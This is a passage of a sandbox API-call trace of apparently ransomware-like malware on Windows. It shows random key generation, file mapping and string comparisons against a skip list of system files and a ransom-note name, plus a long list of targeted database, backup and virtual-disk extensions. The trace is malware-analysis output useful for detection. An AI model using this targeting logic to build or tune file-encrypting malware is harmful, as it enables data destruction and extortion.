lpFileSize=0x2cce090*=47456) returned 1 [0085.946] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0085.947] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0085.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.947] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.947] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbc60, lpName=0x0) returned 0x15c [0085.948] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbc60) returned 0x190000 [0085.951] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0085.952] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.952] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0085.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.952] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.952] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.953] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.953] CloseHandle (hObject=0x15c) returned 1 [0085.953] CloseHandle (hObject=0x118) returned 1 [0085.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0085.953] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.954] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74912800, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x74912800, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x39960, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".") returned 1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="..") returned 1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="windows") returned -1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="bootmgr") returned 1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="temp") returned -1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="boot") returned 1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="ids.txt") returned -1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="ntuser.dat") returned -1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="perflogs") returned -1 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="MSBuild") returned -1 [0085.954] lstrlenW (lpString="GRINTL32.REST.trx_dll") returned 21 [0085.954] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 72 [0085.954] lstrcpyW (in: lpString1=0x2cce468, lpString2="GRINTL32.REST.trx_dll" | out: lpString1="GRINTL32.REST.trx_dll") returned="GRINTL32.REST.trx_dll" [0085.954] lstrlenW (lpString="GRINTL32.REST.trx_dll") returned 21 [0085.954] lstrlenW (lpString="Ares865") returned 7 [0085.954] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0085.954] lstrlenW (lpString=".dll") returned 4 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".dll") returned 1 [0085.954] lstrlenW (lpString=".lnk") returned 4 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".lnk") returned 1 [0085.954] lstrlenW (lpString=".ini") returned 4 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".ini") returned 1 [0085.954] lstrlenW (lpString=".sys") returned 4 [0085.954] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2=".sys") returned 1 [0085.954] lstrlenW (lpString="GRINTL32.REST.trx_dll") returned 21 [0085.955] lstrlenW (lpString="bak") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0085.955] lstrlenW (lpString="ba_") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0085.955] lstrlenW (lpString="dbb") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0085.955] lstrlenW (lpString="vmdk") returned 4 [0085.955] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0085.955] lstrlenW (lpString="rar") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0085.955] lstrlenW (lpString="zip") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0085.955] lstrlenW (lpString="tgz") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0085.955] lstrlenW (lpString="vbox") returned 4 [0085.955] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0085.955] lstrlenW (lpString="vdi") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0085.955] lstrlenW (lpString="vhd") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0085.955] lstrlenW (lpString="vhdx") returned 4 [0085.955] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0085.955] lstrlenW (lpString="avhd") returned 4 [0085.955] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0085.955] lstrlenW (lpString="db") returned 2 [0085.955] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0085.955] lstrlenW (lpString="db2") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0085.955] lstrlenW (lpString="db3") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0085.955] lstrlenW (lpString="dbf") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0085.955] lstrlenW (lpString="mdf") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0085.955] lstrlenW (lpString="mdb") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0085.955] lstrlenW (lpString="sql") returned 3 [0085.955] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0085.956] lstrlenW (lpString="sqlite") returned 6 [0085.956] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0085.956] lstrlenW (lpString="sqlite3") returned 7 [0085.956] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0085.956] lstrlenW (lpString="sqlitedb") returned 8 [0085.956] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0085.956] lstrlenW (lpString="xml") returned 3 [0085.956] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0085.956] lstrlenW (lpString="$er") returned 3 [0085.956] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0085.956] lstrlenW (lpString="4dd") returned 3 [0085.956] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0085.956] lstrlenW (lpString="4dl") returned 3 [0085.956] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0085.956] lstrlenW (lpString="^^^") returned 3 [0085.956] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0085.956] lstrlenW (lpString="abs") returned 3 [0085.956] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0085.956] lstrlenW (lpString="abx") returned 3 [0085.956] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0085.956] lstrlenW (lpString="accdb") returned 5 [0085.956] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0085.956] lstrlenW (lpString="accdc") returned 5 [0085.956] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0085.956] lstrlenW (lpString="accde") returned 5 [0085.956] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0085.956] lstrlenW (lpString="accdr") returned 5 [0085.956] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0085.956] lstrlenW (lpString="accdt") returned 5 [0085.956] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0085.956] lstrlenW (lpString="accdw") returned 5 [0085.956] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0085.956] lstrlenW (lpString="accft") returned 5 [0085.956] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0085.956] lstrlenW (lpString="adb") returned 3 [0085.956] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0085.956] lstrlenW (lpString="adb") returned 3 [0085.956] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0085.957] lstrlenW (lpString="ade") returned 3 [0085.957] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0085.957] lstrlenW (lpString="adf") returned 3 [0085.957] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0085.957] lstrlenW (lpString="adn") returned 3 [0085.957] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0085.957] lstrlenW (lpString="adp") returned 3 [0085.957] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0085.957] lstrlenW (lpString="alf") returned 3 [0085.957] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0085.957] lstrlenW (lpString="ask") returned 3 [0085.957] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0085.957] lstrlenW (lpString="btr") returned 3 [0085.957] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0085.957] lstrlenW (lpString="cat") returned 3 [0085.958] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0085.958] lstrlenW (lpString="cdb") returned 3 [0085.958] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0085.958] lstrlenW (lpString="ckp") returned 3 [0085.958] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0085.958] lstrlenW (lpString="cma") returned 3 [0085.958] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0085.958] lstrlenW (lpString="cpd") returned 3 [0085.958] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0085.958] lstrlenW (lpString="dacpac") returned 6 [0085.958] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0085.958] lstrlenW (lpString="dad") returned 3 [0085.958] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0085.958] lstrlenW (lpString="dadiagrams") returned 10 [0085.958] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0085.958] lstrlenW (lpString="daschema") returned 8 [0085.958] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0085.958] lstrlenW (lpString="db-journal") returned 10 [0085.958] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0085.958] lstrlenW (lpString="db-shm") returned 6 [0085.959] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0085.959] lstrlenW (lpString="db-wal") returned 6 [0085.959] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0085.959] lstrlenW (lpString="dbc") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0085.959] lstrlenW (lpString="dbs") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0085.959] lstrlenW (lpString="dbt") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0085.959] lstrlenW (lpString="dbv") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0085.959] lstrlenW (lpString="dbx") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0085.959] lstrlenW (lpString="dcb") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0085.959] lstrlenW (lpString="dct") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0085.959] lstrlenW (lpString="dcx") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0085.959] lstrlenW (lpString="ddl") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0085.959] lstrlenW (lpString="dlis") returned 4 [0085.959] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0085.959] lstrlenW (lpString="dp1") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0085.959] lstrlenW (lpString="dqy") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0085.959] lstrlenW (lpString="dsk") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0085.959] lstrlenW (lpString="dsn") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0085.959] lstrlenW (lpString="dtsx") returned 4 [0085.959] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0085.959] lstrlenW (lpString="dxl") returned 3 [0085.959] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0085.959] lstrlenW (lpString="eco") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0085.960] lstrlenW (lpString="ecx") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0085.960] lstrlenW (lpString="edb") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0085.960] lstrlenW (lpString="epim") returned 4 [0085.960] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0085.960] lstrlenW (lpString="fcd") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0085.960] lstrlenW (lpString="fdb") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0085.960] lstrlenW (lpString="fic") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0085.960] lstrlenW (lpString="flexolibrary") returned 12 [0085.960] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0085.960] lstrlenW (lpString="fm5") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0085.960] lstrlenW (lpString="fmp") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0085.960] lstrlenW (lpString="fmp12") returned 5 [0085.960] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0085.960] lstrlenW (lpString="fmpsl") returned 5 [0085.960] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0085.960] lstrlenW (lpString="fol") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0085.960] lstrlenW (lpString="fp3") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0085.960] lstrlenW (lpString="fp4") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0085.960] lstrlenW (lpString="fp5") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0085.960] lstrlenW (lpString="fp7") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0085.960] lstrlenW (lpString="fpt") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0085.960] lstrlenW (lpString="frm") returned 3 [0085.960] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0085.960] lstrlenW (lpString="gdb") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0085.961] lstrlenW (lpString="gdb") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0085.961] lstrlenW (lpString="grdb") returned 4 [0085.961] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0085.961] lstrlenW (lpString="gwi") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0085.961] lstrlenW (lpString="hdb") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0085.961] lstrlenW (lpString="his") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0085.961] lstrlenW (lpString="ib") returned 2 [0085.961] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0085.961] lstrlenW (lpString="idb") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0085.961] lstrlenW (lpString="ihx") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0085.961] lstrlenW (lpString="itdb") returned 4 [0085.961] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0085.961] lstrlenW (lpString="itw") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0085.961] lstrlenW (lpString="jet") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0085.961] lstrlenW (lpString="jtx") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0085.961] lstrlenW (lpString="kdb") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0085.961] lstrlenW (lpString="kexi") returned 4 [0085.961] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0085.961] lstrlenW (lpString="kexic") returned 5 [0085.961] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0085.961] lstrlenW (lpString="kexis") returned 5 [0085.961] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0085.961] lstrlenW (lpString="lgc") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0085.961] lstrlenW (lpString="lwx") returned 3 [0085.961] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0085.961] lstrlenW (lpString="maf") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0085.962] lstrlenW (lpString="maq") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0085.962] lstrlenW (lpString="mar") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0085.962] lstrlenW (lpString="marshal") returned 7 [0085.962] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0085.962] lstrlenW (lpString="mas") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0085.962] lstrlenW (lpString="mav") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0085.962] lstrlenW (lpString="maw") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0085.962] lstrlenW (lpString="mdbhtml") returned 7 [0085.962] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0085.962] lstrlenW (lpString="mdn") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0085.962] lstrlenW (lpString="mdt") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0085.962] lstrlenW (lpString="mfd") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0085.962] lstrlenW (lpString="mpd") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0085.962] lstrlenW (lpString="mrg") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0085.962] lstrlenW (lpString="mud") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0085.962] lstrlenW (lpString="mwb") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0085.962] lstrlenW (lpString="myd") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0085.962] lstrlenW (lpString="ndf") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0085.962] lstrlenW (lpString="nnt") returned 3 [0085.962] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0085.962] lstrlenW (lpString="nrmlib") returned 6 [0085.962] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0085.963] lstrlenW (lpString="ns2") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0085.963] lstrlenW (lpString="ns3") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0085.963] lstrlenW (lpString="ns4") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0085.963] lstrlenW (lpString="nsf") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0085.963] lstrlenW (lpString="nv") returned 2 [0085.963] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0085.963] lstrlenW (lpString="nv2") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0085.963] lstrlenW (lpString="nwdb") returned 4 [0085.963] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0085.963] lstrlenW (lpString="nyf") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0085.963] lstrlenW (lpString="odb") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0085.963] lstrlenW (lpString="odb") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0085.963] lstrlenW (lpString="oqy") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0085.963] lstrlenW (lpString="ora") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0085.963] lstrlenW (lpString="orx") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0085.963] lstrlenW (lpString="owc") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0085.963] lstrlenW (lpString="p96") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0085.963] lstrlenW (lpString="p97") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0085.963] lstrlenW (lpString="pan") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0085.963] lstrlenW (lpString="pdb") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0085.963] lstrlenW (lpString="pdm") returned 3 [0085.963] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0085.963] lstrlenW (lpString="pnz") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0085.964] lstrlenW (lpString="qry") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0085.964] lstrlenW (lpString="qvd") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0085.964] lstrlenW (lpString="rbf") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0085.964] lstrlenW (lpString="rctd") returned 4 [0085.964] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0085.964] lstrlenW (lpString="rod") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0085.964] lstrlenW (lpString="rodx") returned 4 [0085.964] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0085.964] lstrlenW (lpString="rpd") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0085.964] lstrlenW (lpString="rsd") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0085.964] lstrlenW (lpString="sas7bdat") returned 8 [0085.964] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0085.964] lstrlenW (lpString="sbf") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0085.964] lstrlenW (lpString="scx") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0085.964] lstrlenW (lpString="sdb") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0085.964] lstrlenW (lpString="sdc") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0085.964] lstrlenW (lpString="sdf") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0085.964] lstrlenW (lpString="sis") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0085.964] lstrlenW (lpString="spq") returned 3 [0085.964] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0085.964] lstrlenW (lpString="te") returned 2 [0085.964] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0085.964] lstrlenW (lpString="teacher") returned 7 [0085.965] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0085.965] lstrlenW (lpString="tmd") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0085.965] lstrlenW (lpString="tps") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0085.965] lstrlenW (lpString="trc") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0085.965] lstrlenW (lpString="trc") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0085.965] lstrlenW (lpString="trm") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0085.965] lstrlenW (lpString="udb") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0085.965] lstrlenW (lpString="udl") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0085.965] lstrlenW (lpString="usr") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0085.965] lstrlenW (lpString="v12") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0085.965] lstrlenW (lpString="vis") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0085.965] lstrlenW (lpString="vpd") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0085.965] lstrlenW (lpString="vvv") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0085.965] lstrlenW (lpString="wdb") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0085.965] lstrlenW (lpString="wmdb") returned 4 [0085.965] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0085.965] lstrlenW (lpString="wrk") returned 3 [0085.965] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0085.965] lstrlenW (lpString="xdb") returned 3 